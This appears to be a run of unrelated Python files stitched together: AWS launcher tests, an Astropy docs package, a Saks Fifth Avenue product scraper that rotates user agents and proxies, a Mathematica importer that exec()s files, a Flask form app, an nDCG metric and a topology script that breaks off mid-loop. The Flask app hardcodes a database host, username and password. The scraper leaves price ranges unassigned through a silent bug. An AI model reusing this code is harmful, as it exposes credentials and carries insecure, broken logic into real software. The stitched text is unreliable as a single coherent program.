"""
monkeypatch.setattr(test_util.aws, 'fetch_stack', mock_stack_not_found)
config = launch.config.get_validated_config(aws_cf_config_path)
assert 'platform' in config, str(config.items())
aws_launcher = launch.get_launcher(config)
def check_stack_error(cmd, args):
with pytest.raises(launch.util.LauncherError) as exinfo:
getattr(aws_launcher, cmd)(*args)
assert exinfo.value.error == 'StackNotFound'
info = aws_launcher.create(config)
check_stack_error('wait', (info,))
check_stack_error('describe', (info,))
check_stack_error('delete', (info,))
check_stack_error('test', (info, 'py.test'))
def test_key_helper(aws_cf_config_path):
config = launch.config.get_validated_config(aws_cf_config_path)
aws_launcher = launch.get_launcher(config)
temp_resources = aws_launcher.key_helper(config)
assert temp_resources['key_name'] == config['deployment_name']
assert yaml.load(config['template_parameters'])['KeyName'] == config['deployment_name']
assert config['ssh_private_key'] == launch.util.MOCK_SSH_KEY_DATA
def test_zen_helper(aws_zen_cf_config_path):
config = launch.config.get_validated_config(aws_zen_cf_config_path)
aws_launcher = launch.get_launcher(config)
temp_resources = aws_launcher.zen_helper(config)
assert temp_resources['vpc'] == launch.util.MOCK_VPC_ID
assert temp_resources['gateway'] == launch.util.MOCK_GATEWAY_ID
assert temp_resources['private_subnet'] == launch.util.MOCK_SUBNET_ID
assert temp_resources['public_subnet'] == launch.util.MOCK_SUBNET_ID
template_parameters = yaml.load(config['template_parameters'])
assert template_parameters['Vpc'] == launch.util.MOCK_VPC_ID
assert template_parameters['InternetGateway'] == launch.util.MOCK_GATEWAY_ID
assert template_parameters['PrivateSubnet'] == launch.util.MOCK_SUBNET_ID
assert template_parameters['PublicSubnet'] == launch.util.MOCK_SUBNET_ID
|
"""
This package contains utilities and extensions for the Astropy sphinx
documentation. In particular, the `astropy.sphinx.conf` should be imported by
the sphinx ``conf.py`` file for affiliated packages that wish to make use of
the Astropy documentation format. Note that some sphinx extensions which are
bundled as-is (numpydoc and sphinx-automodapi) are included in
astropy_helpers.extern rather than astropy_helpers.sphinx.ext.
"""
__version__ = '1.0.dev0'
|
# -*- coding: utf-8 -*-
from scrapy.spiders import Spider
from scrapy.selector import Selector
from gorden_crawler.items import BaseItem, ImageItem, SkuItem, Color
from scrapy import Request
from scrapy_redis.spiders import RedisSpider
from gorden_crawler.spiders.shiji_base import BaseSpider
import logging
import re
import execjs
import json
import os
class SaksfifthavenueBaseSpider(object):
def handle_parse_item(self, response, item):
match = re.search(r'<script type\=\"application\/json\">({"ProductDetails".+?)<\/script>', response.body)
print match.group(1)
sel = Selector(response)
if match is None:
return
context = execjs.compile('''
var json = %s
function getJson(){
return json;
}
''' % match.group(1))
product_json = context.call('getJson')
main_product = product_json['ProductDetails']['main_products'][0]
item['brand'] = main_product['brand_name']['label']
item['title'] = main_product['short_description']
show_product_id = main_product['product_code']
item['show_product_id'] = show_product_id
item['desc'] = main_product['description']
list_price = main_product['price']['list_price']['usd_currency_value']
if re.findall('\-', list_price):
re.search('([\d\.]+)\s*\-', list_price).group(1)
else:
item['list_price'] = list_price
sale_price = main_product['price']['sale_price']['usd_currency_value']
if re.findall('\-', sale_price):
re.search('([\d\.]+)\s*\-', sale_price).group(1)
else:
item['current_price'] = sale_price
item['dimensions'] = ['size']
skus = []
sizes = {}
sizes['size'] = []
color_names = []
colors = main_product['colors']['colors']
handle_color_map = {}
if len(colors) > 0:
for color in colors:
handle_color_map[color['id']] = color['label']
handle_size_map = {}
if len(main_product['sizes']['sizes']) == 0:
sizes['size'].append('onesize')
else:
for size in main_product['sizes']['sizes']:
handle_size_map[size['id']] = size['value']
sizes['size'].append(size['value'])
image_prefix = 'http:' + main_product['media']['images_server_url'] + main_product['media']['images_path']
if len(colors) == 0:
color_name = 'onecolor'
color_names.append(color_name)
common_images = main_product['media']['images']
images = []
for common_image in common_images:
imageItem = ImageItem()
imageItem['image'] = image_prefix + common_image + '?wid=970&hei=1293&fmt=jpg'
imageItem['thumbnail'] = image_prefix + common_image + '?wid=396&hei=528&fmt=jpg'
images.append(imageItem)
first_thumbnail = images[0]['thumbnail']
colorItem = Color()
colorItem['type'] = 'color'
colorItem['from_site'] = item['from_site']
colorItem['show_product_id'] = item['show_product_id']
colorItem['images'] = images
colorItem['name'] = color_name
colorItem['cover'] = first_thumbnail
colorItem['version'] = '1'
yield colorItem
else:
common_images = main_product['media']['images']
for color in colors:
color_name = color['label']
color_names.append(color_name)
images = []
imageItem = ImageItem()
imageItem['image'] = image_prefix + color['colorize_image_url'] + '?wid=970&hei=1293&fmt=jpg'
imageItem['thumbnail'] = image_prefix + color['colorize_image_url'] + '?wid=396&hei=528&fmt=jpg'
images.append(imageItem)
first_thumbnail = images[0]['thumbnail']
for common_image in common_images:
imageItem = ImageItem()
imageItem['image'] = image_prefix + common_image + '?wid=970&hei=1293&fmt=jpg'
imageItem['thumbnail'] = image_prefix + common_image + '?wid=396&hei=528&fmt=jpg'
images.append(imageItem)
colorItem = Color()
colorItem['type'] = 'color'
colorItem['from_site'] = item['from_site']
colorItem['show_product_id'] = item['show_product_id']
colorItem['images'] = images
colorItem['name'] = color_name
colorItem['version'] = '1'
if len(color['value']) > 0:
if re.findall('\#', color['value']):
colorItem['cover_style'] = color['value']
else:
cover_img_str = sel.xpath('//li[@class="product-color-options__value" and @data-colorid=' + str(color["id"]) + ']/@style').extract()
cover_unavi_str = sel.xpath('//li[@class="product-color-options__value product-color-options__value--unavailable" and @data-colorid=' + str(color["id"]) + ']/@style').extract()
cover_sel_str = sel.xpath('//li[@class="product-color-options__value product-color-options__value--selected" and @data-colorid=' + str(color["id"]) + ']/@style').extract()
cover_hid_str = sel.xpath('//li[@class="product-color-options__value is-hidden" and @data-colorid=' + str(color["id"]) + ']/@style').extract()
if len(cover_img_str)>0:
cover_img = re.search('\((.+)\)', cover_img_str[0]).group(1)
colorItem['cover'] = 'http:' + cover_img
elif len(cover_unavi_str)>0:
cover_img_str = cover_unavi_str[0]
cover_img = re.search('\((.+)\)', cover_img_str).group(1)
colorItem['cover'] = 'http:' + cover_img
elif len(cover_sel_str)>0:
cover_img_str = cover_sel_str[0]
cover_img = re.search('\((.+)\)', cover_img_str).group(1)
colorItem['cover'] = 'http:' + cover_img
elif len(cover_hid_str)>0:
cover_img_str = cover_hid_str[0]
cover_img = re.search('\((.+)\)', cover_img_str).group(1)
colorItem['cover'] = 'http:' + cover_img
else:
colorItem['cover'] = first_thumbnail
else:
colorItem['cover'] = first_thumbnail
yield colorItem
item['colors'] = color_names
for sku in main_product['skus']['skus']:
sku_id = sku['sku_id']
if sku_id == 'DUMMY':
continue
if sku['color_id'] == -1:
color_name = 'onecolor'
else:
color_name = handle_color_map[sku['color_id']]
if sku['size_id'] == -1:
size = 'onesize'
else:
size = handle_size_map[sku['size_id']]
skuItem = SkuItem()
skuItem['type'] = 'sku'
skuItem['show_product_id'] = item['show_product_id']
skuItem['from_site'] = item['from_site']
skuItem['id'] = sku_id
skuItem['size'] = size
skuItem['color'] = color_name
if sku['status_alias'] == 'soldout' or sku['status_alias'] == 'waitlist':
skuItem['is_outof_stock'] = True
else:
skuItem['is_outof_stock'] = False
if len(sku['price']['sale_price']['usd_currency_value']) > 0:
skuItem['current_price'] = sku['price']['sale_price']['usd_currency_value']
else:
continue
if len(sku['price']['list_price']['usd_currency_value']) > 0:
skuItem['list_price'] = sku['price']['list_price']['usd_currency_value']
else:
continue
skus.append(skuItem)
item['sizes'] = sizes
item['skus'] = skus
if main_product['size_guide_link']['enabled'] == True:
sizeInfo = main_product['size_guide_link']['url']
findQ = sizeInfo.find("?")
if findQ != -1:
item['size_info'] = sizeInfo[:findQ]
else:
item['size_info'] = sizeInfo
yield item
# def handle_parse_item(self,response,item):
# sel = Selector(response)
# if len(sel.xpath('//div[contains(@class, "main-product")]//div[contains(@class, "sold-out-message")]').extract()) > 0:
# return
#
# jsonStr = "".join(re.findall(r'<script type="text/javascript">[\s]*(var mlrs = .*)[\s]*</script>', response.body))
#
# if jsonStr == '':
# if os.environ.get('item_update_notify_redis') == 'True':
# logging.warning('old')
#
# detail_block = sel.xpath('//div[re:test(@class, "\s*pdp-item-container clearfix\s*$")]')
#
# item['brand'] = detail_block.xpath('.//h1[@class="brand"]/text()').extract()[0]
# title = detail_block.xpath('.//h2[@class="description"]/text()').extract()
# if len(title) > 0:
# item['title'] = title[0]
# else:
# item['title'] = item['brand']
#
# item['show_product_id'] = detail_block.xpath('.//h3[@class="product-code-reskin"]/text()').extract()[0]
# item['desc'] = detail_block.xpath('.//span[@class="pdp-reskin-detail-content"]').extract()[0]
#
# list_price = detail_block.xpath('.//span[@class="product-price"]/text()').re(r'^\s*\$([\d\.]+)')[0]
#
# sale_price = detail_block.xpath('.//span[@class="product-sale-price"]/text()').re(r'^\s*\$([\d\.]+)')
# if len(sale_price) > 0:
# current_price = sale_price[0]
# else:
# current_price = list_price
#
# item['current_price'] = current_price
# item['list_price'] = list_price
#
# item['dimensions'] = ['size']
# skus = []
# sizes = {}
# sizes['size'] = []
# color_names = []
#
# options = detail_block.xpath('//select[@productcode="' + item['show_product_id'] + '"]/option')
#
# if len(options) > 0:
# for option in options:
#
# sku_id = option.xpath('./@value').extract()[0]
#
# if sku_id == '0':
# continue
#
# skuItem = SkuItem()
# skuItem['type'] = 'sku'
# skuItem['show_product_id'] = item['show_product_id']
# skuItem['from_site'] = item['from_site']
# skuItem['id'] = sku_id
#
# size = option.xpath('./@data-product-size').extract()[0]
# if size == '.' or size == 'NO SIZE':
# size = 'onesize'
# skuItem['size'] = size
# if size not in sizes['size']:
# sizes['size'].append(size)
#
# color = option.xpath('./@data-colorname').extract()[0]
# if color == 'NO COLOR':
# color = 'onecolor'
#
# skuItem['color'] = color
# if color not in color_names:
# color_names.append(color)
#
# is_outof_stock = False
# wait_list = option.xpath('./@data-waitlist')
# if len(wait_list) > 0:
# if wait_list.extract()[0] == "true":
# is_outof_stock = True
#
# skuItem['is_outof_stock'] = is_outof_stock
# skuItem['current_price'] = item['current_price']
# skuItem['list_price'] = item['list_price']
#
# skus.append(skuItem)
# else:
# sku_id = sel.xpath('//div[@id="pdSizeColor--MainProductqtyToBuy0"]/input[@name="ADD_CART_ITEM_ARRAY<>sku_id"]/@value').extract()[0]
#
# skuItem = SkuItem()
# skuItem['type'] = 'sku'
# skuItem['show_product_id'] = item['show_product_id']
# skuItem['from_site'] = item['from_site']
# skuItem['id'] = sku_id
#
# skuItem['size'] = 'onesize'
# sizes['size'].append('onesize')
#
# skuItem['color'] = 'onecolor'
# color_names.append('onecolor')
#
# skuItem['current_price'] = item['current_price']
# skuItem['list_price'] = item['list_price']
# skuItem['is_outof_stock'] = False
#
# skus.append(skuItem)
#
# item['skus'] = skus
# item['sizes'] = sizes
#
# item['colors'] = []
# select_colors = detail_block.xpath('.//div[@class="product-swatches-container"]')
# if len(select_colors) > 0:
# color_lis = detail_block.xpath('.//div[@class="product-swatches-container"]//ul/li')
#
# for color_li in color_lis:
#
# color_div = color_li.xpath('.//div[@class="swatch-thumbnail"]')
#
# image_url = color_div.xpath('./@data-url').extract()[0]
# color_name = color_div.xpath('./@data-color').extract()[0]
#
# item['colors'].append(color_name)
#
# imageItem = ImageItem()
# imageItem['thumbnail'] = "http://image.s5a.com/is/image/" + image_url + '_247x329.jpg'
# imageItem['image'] = "http://image.s5a.com/is/image/" + image_url + '_396x528.jpg'
#
# colorItem = Color()
#
# colorItem['type'] = 'color'
# colorItem['from_site'] = item['from_site']
# colorItem['show_product_id'] = item['show_product_id']
# colorItem['images'] = [imageItem]
# colorItem['name'] = color_name
#
# color_style = color_div.xpath('./@style')
#
# if len(color_style) > 0:
# colorItem['cover_style'] = color_style.re(r'background-color:(.+);')[0]
# if '#' not in colorItem['cover_style']:
# colorItem['cover_style'] = '' + colorItem['cover_style']
# else:
# colorItem['cover'] = imageItem['thumbnail']
#
# yield colorItem
# else:
# color_name = color_names[0]
#
# item['colors'].append(color_name)
#
# imageItem = ImageItem()
# imageItem['thumbnail'] = "http://image.s5a.com/is/image/saks/" + item['show_product_id'] + '_247x329.jpg'
# imageItem['image'] = "http://image.s5a.com/is/image/saks/" + item['show_product_id'] + '_396x528.jpg'
#
# colorItem = Color()
#
# colorItem['type'] = 'color'
# colorItem['from_site'] = item['from_site']
# colorItem['show_product_id'] = item['show_product_id']
# colorItem['images'] = [imageItem]
# colorItem['name'] = color_name
# colorItem['cover'] = imageItem['thumbnail']
#
# yield colorItem
#
# size_info_div = detail_block.xpath('.//div[@class="size-additional-info"]/a/@href').re(r'\'(http://.+)\',')
#
# if len(size_info_div) > 0:
# size_info = size_info_div[0]
# findQ = size_info.find("?")
# if findQ != -1:
# item['size_info'] = size_info[:findQ]
# else:
# item['size_info'] = size_info
#
# yield item
#
# else:
# context = execjs.compile('''
# %s
# function getMlrs(){
# return mlrs;
# }
# ''' % jsonStr)
#
# mlrs = context.call('getMlrs')
#
#
# item['brand'] = mlrs['response']['body']['main_products'][0]['brand_name']['label']
# item['title'] = mlrs['response']['body']['main_products'][0]['short_description']
# if item['title'] == '':
# item['title'] = item['brand']
# item['show_product_id'] = mlrs['response']['body']['main_products'][0]['product_code']
# item['desc'] = mlrs['response']['body']['main_products'][0]['description']
# find = mlrs['response']['body']['main_products'][0]['price']['sale_price'].find(" - ")
# if find != -1:
# item['current_price'] = mlrs['response']['body']['main_products'][0]['price']['sale_price'][:find].replace("$",'')
# else:
# item['current_price'] = mlrs['response']['body']['main_products'][0]['price']['sale_price'].replace("$",'')
#
# find2 = mlrs['response']['body']['main_products'][0]['price']['list_price'].find(" - ")
# if find2 != -1:
# item['list_price'] = mlrs['response']['body']['main_products'][0]['price']['list_price'][find2+3:].replace("$",'')
# else:
# item['list_price'] = mlrs['response']['body']['main_products'][0]['price']['list_price'].replace("$",'')
#
# colors = {}
# item['colors'] = []
# if len(mlrs['response']['body']['main_products'][0]['colors']['colors']) > 0:
# for color in mlrs['response']['body']['main_products'][0]['colors']['colors']:
# colors[color['color_id']] = color['label']
# item['colors'].append(color['label'])
# imageItem = ImageItem()
# imageItem['thumbnail'] = "http:" + mlrs['response']['body']['main_products'][0]['media']['images_server_url'] + "is/image/" + color['colorized_image_url'] + '_247x329.jpg'
# imageItem['image'] = "http:" + mlrs['response']['body']['main_products'][0]['media']['images_server_url'] + "is/image/" + color['colorized_image_url'] + '_396x528.jpg'
#
# colorItem = Color()
# colorItem['type'] = 'color'
# colorItem['from_site'] = item['from_site']
# colorItem['show_product_id'] = item['show_product_id']
# colorItem['images'] = [imageItem]
# colorItem['name'] = color['label']
# if color['value'] != '':
# colorItem['cover_style'] = '#' + color['value']
# else:
# colorItem['cover'] = imageItem['thumbnail']
#
# yield colorItem
# else:
# colors[-1] = 'onecolor'
# item['colors'].append('onecolor')
# imageItem = ImageItem()
# imageItem['thumbnail'] = "http:" + mlrs['response']['body']['main_products'][0]['media']['images_server_url'] + mlrs['response']['body']['main_products'][0]['media']['images']['product_array_image']
# imageItem['image'] = "http:" + mlrs['response']['body']['main_products'][0]['media']['images_server_url'] + mlrs['response']['body']['main_products'][0]['media']['images']['product_detail_image']
#
# colorItem = Color()
# colorItem['type'] = 'color'
# colorItem['from_site'] = item['from_site']
# colorItem['show_product_id'] = item['show_product_id']
# colorItem['images'] = [imageItem]
# colorItem['name'] = 'onecolor'
# yield colorItem
#
# item['dimensions'] = ['size']
# sizes = {}
# item['sizes'] = []
# if len(mlrs['response']['body']['main_products'][0]['sizes']['sizes']) > 0:
# for size in mlrs['response']['body']['main_products'][0]['sizes']['sizes']:
# sizes[size['size_id']] = size['value']
# item['sizes'].append(size['value'])
# else:
# sizes[-1] = 'onesize'
# item['sizes'].append('onesize')
#
# item['skus'] = []
# for sku in mlrs['response']['body']['main_products'][0]['skus']['skus']:
# if sku['color_id'] in colors.keys() and sku['size_id'] in sizes.keys():
# skuItem = {}
# skuItem['type'] = 'sku'
# skuItem['show_product_id'] = item['show_product_id']
# skuItem['id'] = sku['sku_id']
# skuItem['list_price'] = sku['price']['list_price'].replace("$",'')
# skuItem['current_price'] = sku['price']['sale_price'].replace("$",'')
# skuItem['color'] = colors[sku['color_id']]
# skuItem['size'] = sizes[sku['size_id']]
#
# skuItem['from_site'] = item['from_site']
# skuItem['is_outof_stock'] = False if sku['status_alias'] == 'available' else True
# item['skus'].append(skuItem)
#
# if mlrs['response']['body']['main_products'][0]['size_guide_link']['enabled']:
# sizeInfo = mlrs['response']['body']['main_products'][0]['size_guide_link']['url']
# findQ = sizeInfo.find("?")
# if findQ != -1:
# item['size_info'] = sizeInfo[:findQ]
# else:
# item['size_info'] = sizeInfo
#
# yield item
class SaksfifthavenueSpider(BaseSpider,SaksfifthavenueBaseSpider):
name = "saksfifthavenue"
allowed_domains = ["saksfifthavenue.com"]
custom_settings = {
#'USER_AGENT': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36',
'DOWNLOAD_DELAY': 0.5,
'DOWNLOAD_TIMEOUT': 30,
'RETRY_TIMES': 20,
'DOWNLOADER_MIDDLEWARES': {
#'gorden_crawler.middlewares.MyCustomDownloaderMiddleware': 543,
'scrapy.downloadermiddleware.useragent.UserAgentMiddleware': None,
'gorden_crawler.contrib.downloadmiddleware.rotate_useragent.RotateUserAgentMiddleware':1,
'gorden_crawler.middlewares.proxy_ats.ProxyMiddleware': 100,
# 'scrapy.downloadermiddlewares.httpproxy.HttpProxyMiddleware': 110,
}
}
#正式运行的时候,start_urls为空,通过redis来喂养爬虫
start_urls = [
'http://www.saksfifthavenue.com',
]
base_url = 'http://www.saksfifthavenue.com'
#爬虫解析入口函数,用于解析丢入的第一个请求。每个请求对应一个大类
def start_requests(self):
for url in self.start_urls:
yield Request(url)
def parse(self, response):
sel = Selector(response)
navDom = sel.xpath(".//div[@class='nav']/ul/li")
navStandard = {
'WomensApparelNavMenu':{'gender':'women', 'product_type':'clothing'},
'ShoesNavMenu':{'gender':'women', 'product_type':'shoes'},
'HandbagsNavMenu':{'gender':'women', 'product_type':'bags'},
'JewelryAccessoriesNavMenu':{'gender':'women', 'product_type':'accessories'},
'TheMensStoreNavMenu':{'gender':'men', 'product_type':'clothing'},
'JustKidsNavMenu':{'gender':'baby', 'product_type':'mother&baby'},
'SaksBeautyPlaceNavMenu':{'gender':'women', 'product_type':'beauty'}
}
for nav in navDom:
navId = nav.xpath("./@id").extract()[0]
if navId in navStandard.keys():
if navId == 'HandbagsNavMenu' or navId == 'JewelryAccessoriesNavMenu':
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[2]/ul[1]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":navStandard[navId]['gender'], "product_type":navStandard[navId]['product_type']})
elif navId == 'TheMensStoreNavMenu':
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[2]/ul[1]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":navStandard[navId]['gender'], "product_type":'shoes'})
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[2]/ul[2]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":navStandard[navId]['gender'], "product_type":'accessories'})
elif navId == 'JustKidsNavMenu':
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[1]/ul[2]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
gender = 'toddler' if category == 'Girls (2-6)' else 'girls'
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":gender, "product_type":navStandard[navId]['product_type']})
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[1]/ul[3]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
gender = 'toddler' if category == 'Boys (2-6)' else 'boys'
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":gender, "product_type":navStandard[navId]['product_type']})
elif navId == 'SaksBeautyPlaceNavMenu':
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[1]/ul[3]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
gender = 'women'
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":gender, "product_type":navStandard[navId]['product_type']})
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[2]/ul[1]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
gender = 'men'
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":gender, "product_type":navStandard[navId]['product_type']})
else:
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[1]/ul[1]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All', 'New Arrivals', 'Best Sellers', 'Special Offers','Bag Accessories']:
url = dom.xpath("./a/@href").extract()[0]
yield Request(url, callback=self.parse_list, meta={"category_url": url, "category": category, "gender": navStandard[navId]['gender'], "product_type": navStandard[navId]['product_type']})
def parse_list(self, response):
category = response.meta['category']
gender = response.meta['gender']
product_type = response.meta['product_type']
category_url = response.meta['category_url']
sel = Selector(response)
# if len(sel.xpath(".//div[@id='pc-top']/div[1]/span[1]/text()").extract()) == 0:
# return
listDom = sel.xpath(".//*[@id='product-container']/div[@class!='pa-row-spacer' and @class!='clear']")
if len(listDom.extract()) > 0:
for dom in listDom:
item = BaseItem()
item['from_site'] = 'saksfifthavenue'
item['type'] = 'base'
item['category'] = category
item['product_type'] = product_type
item['gender'] = gender
# item['title'] = dom.xpath("./div[@class='product-text']//p[@class='product-description']/text()").extract()[0]
# item['brand'] = dom.xpath("./div[@class='product-text']//span[@class='product-designer-name']/text()").extract()[0]
# item["show_product_id"] = dom.xpath("./div[@class='product-text']/a/p[1]/@productcode").extract()[0]
# item['cover'] = dom.xpath("./div[@class='sfa-pa-product-swatches-container']/div[1]/img/@data-src").extract()[0]
pid = dom.xpath("./div[@class='image-container-large']/a[1]/@name").extract()[0]
item['cover'] = dom.xpath("./div[@class='image-container-large']/a[@id='image-url-" + pid +"']/img[last()]/@src").extract()[0]
item["url"] = url = dom.xpath("./div[@class='product-text']/a/@href").extract()[0]
yield Request(url, callback=self.parse_item, meta={"item": item})
if len(sel.xpath(".//*[@id='pc-top']/ol//a[@class='page-selected']/text()")) == 0:
currentPage = 1
else:
currentPage = sel.xpath(".//*[@id='pc-top']/ol//a[@class='page-selected']/text()").extract()[0]
countStr = sel.xpath(".//div[@id='pc-top']/div[1]/span[1]/text()").extract()[0]
countTotal = int(countStr.replace(',','').replace('.','').replace(' ',''))
lastPage = countTotal / 60 + 1 if countTotal % 60 > 0 else countTotal / 60
if int(currentPage) < int(lastPage):
list_more_url = category_url + '&Nao=' + str((int(currentPage))*60)
yield Request(list_more_url, callback=self.parse_list, meta={"category":category, "product_type":product_type,"gender":gender, "category_url":category_url})
else:
return
def parse_item(self, response):
item = response.meta['item']
return self.handle_parse_item(response, item)
def handle_parse_item(self, response, item):
return SaksfifthavenueBaseSpider.handle_parse_item(self, response, item) |
"""This defines a quick I/O framework for importing from Mathematica
"""
from __future__ import print_function
import os
mathematica_type_importers = {}
def mathematica_default_import(i_dict):
return i_dict["ImportValue"]
def mathematica_register_type_importer(t, f):
mathematica_type_importers[t] = f
mathematica_importer_dir = os.path.join(os.path.dirname(__file__), "importers")
def mathematica_load_importer(m_typ):
if m_typ not in mathematica_type_importers:
m_path = os.path.join(
mathematica_importer_dir,
m_typ+".py"
);
if os.path.exists( m_path ):
try:
imp_file = open(m_path)
exec(imp_file.read())
finally:
imp_file.close()
if m_typ in mathematica_type_importers:
m_importer = mathematica_type_importers[m_typ]
else:
m_importer = mathematica_default_import
return m_importer
def _mathematica_import_core(i_dict):
imp = mathematica_load_importer(i_dict["ImportType"])
return imp(i_dict)
def mathematica_import(i_dict):
imp_data = _mathematica_import_core(i_dict)
return imp_data
|
from flask import Flask, request, render_template
import mysql.connector
app = Flask(__name__)
connection = mysql.connector.connect(host='database-maui.ct7yl5rjhgtx.us-east-1.rds.amazonaws.com',
database='mauidb',
user='admin',
password='Adminpass')
@app.route('/', methods = ['GET','POST'])
def enter_data_values():
if request.method == 'POST':
text1 = request.form['scientist']
text2 = request.form['location']
text3 = request.form['date']
text4 = request.form['result']
cursor = connection.cursor()
cursor.execute("INSERT INTO TestTable3 (scientist, location, date, result) VALUES (%s,%s,%s,%s)", (text1, text2, text3, text4))
connection.commit()
connection.close
return render_template('DataEntryUI.html')
if __name__ == '__main__':
app.run(host="0.0.0.0", port=80)
|
'''
Implementation of the nDCG metric for ranking evaluation.
Balazs Kovacs, 2017
'''
import numpy as np
def dcg(rel_scores, k=None, use_exp=False):
'''
Computes the DCG metric as defined in https://en.wikipedia.org/wiki/Discounted_cumulative_gain
:param rel_scores: List of relevance scores.
:param k: We will compute DCG@k. If k is None, we will set it to
len(rel_scores).
:param use_exp: If True, we use 2 ** (relevance score) - 1 in the numerator
instead of (relevance score).
:returns: The DCG score of the input
'''
if k is None:
k = len(rel_scores)
rel_scores = np.array(rel_scores, dtype=float)[:k]
if use_exp:
num = 2 ** rel_scores - 1
else:
num = rel_scores
den = np.log2(np.arange(k) + 2)
return np.sum(num / den)
def ndcg(rel_scores, k=None, use_exp=False):
'''
Computes the nDCG metric as defined in https://en.wikipedia.org/wiki/Discounted_cumulative_gain#Normalized_DCG
:param rel_scores: List of relevance scores.
:param k: We will compute nDCG@k. If k is None, we will set it to
len(rel_scores).
:param use_exp: If True, we use 2 ** (relevance score) - 1 in the numerator
instead of (relevance score).
:returns: The nDCG score of the input
'''
if k is None:
k = len(rel_scores)
dcg_val = dcg(rel_scores=rel_scores, k=k, use_exp=use_exp)
idcg_val = dcg(rel_scores=sorted(rel_scores, reverse=True), k=k, use_exp=use_exp)
return dcg_val / idcg_val
#if __name__ == '__main__':
#r = [3, 2, 3, 0, 1, 2]
#for use_exp in [False, True]:
#print dcg(rel_scores=r, use_exp=use_exp)
#print ndcg(rel_scores=r, use_exp=use_exp)
|
import math
import numpy as np
from sklearn.metrics import pairwise_distances
from scipy.spatial import distance
from scripts.ssc.persistence_pairings_visualization.Pseudo_AlphaBetaWitnessComplex import \
count_pairings
from scripts.ssc.persistence_pairings_visualization.utils_definitions import make_plot
from src.datasets.datasets import SwissRoll
def wl_table(witnesses, landmarks):
return pairwise_distances(witnesses,landmarks)
def update_register_simplex(register, i_add, i_dist, max_dim = math.inf):
register_add = []
simplex_add = []
for element in register:
if len(element)< max_dim:
element_copy = element.copy()
element_copy.append(i_add)
register_add.append(element_copy)
simplex_add.append([element_copy, i_dist])
return register_add, simplex_add
def get_pairs_0(distances):
simplices = []
for row_i in range(distances.shape[0]):
col = distances[row_i,:]
sort_col = sorted([*enumerate(col)], key=lambda x: x[1])
simplices_temp = []
register = []
for i in range(len(sort_col)):
register_add, simplex_add = update_register_simplex(register.copy(), sort_col[i][0],sort_col[i][1],2)
register += register_add
register.append([sort_col[i][0]])
simplices_temp += simplex_add
simplices += simplices_temp
return sorted(simplices, key=lambda t: t[1])
def get_pairs_1(distances, landmarks):
pairs = []
for row_i in range(distances.shape[0]):
temp = []
col = distances[row_i,:]
sort_col = sorted([*enumerate(col)], key=lambda x: x[1])
i1, i2 = sort_col[0][0],sort_col[1][0]
dist1, dist2 = sort_col[0][1], sort_col[1][1]
temp.append([i1,i2])
temp.append((dist1+dist2))
pairs.append(temp)
return sorted(pairs, key=lambda t: t[1])
def get_persistence_pairs(pairs, n_landmarks):
indices = list(range(0, n_landmarks))
pairs_filtered = []
for element in pairs:
pair = element[0]
if len(pair) == 2:
# print(pair)
add = False
if pair[0] in indices:
add = True
indices.remove(pair[0])
if pair[1] in indices:
add = True
indices.remove(pair[1])
if add:
pairs_filtered.append(pair)
if len(indices) == 0:
break
else:
pass
return pairs_filtered
if __name__ == "__main__":
# n_samples_array = [32,48,64,96,128]
# n_witnesses_array = [2048,4096]
# seeds = [10,13,20]
# for n_witnesses in n_witnesses_array:
# for seed in seeds:
# for n_samples in n_samples_array:
#
# name = 'witness_ssc_nl{}_nw{}_seed{}'.format(n_samples, n_witnesses, seed)
# dataset_sampler = SwissRoll()
# n_landmarks = n_samples
# seed = seed
# landmarks, color = dataset_sampler.sample(n_landmarks, seed = seed)
# witnesses, _ = dataset_sampler.sample(n_witnesses, seed=(seed+17))
#
#
# distances = wl_table(witnesses,landmarks)
# pairs = get_pairs_1(distances, landmarks)
#
# pairs_filtered = get_persistence_pairs(pairs, n_samples)
#
# count_pairings(n_samples, pairs_filtered)
# make_plot(landmarks, pairs_filtered, color, name=name)
n_samples_array = [32,48,64,96,128]
n_witnesses_array = [256,512,1024]
seeds = [10,13,20]
n_samples_array = [64]
n_witnesses_array = [512]
seeds = [27]
for n_witnesses in n_witnesses_array:
for seed in seeds:
for n_samples in n_samples_array:
name = 'witness_ssc_corrected_nl{}_nw{}_seed{}'.format(n_samples, n_witnesses, seed)
dataset_sampler = SwissRoll()
n_landmarks = n_samples
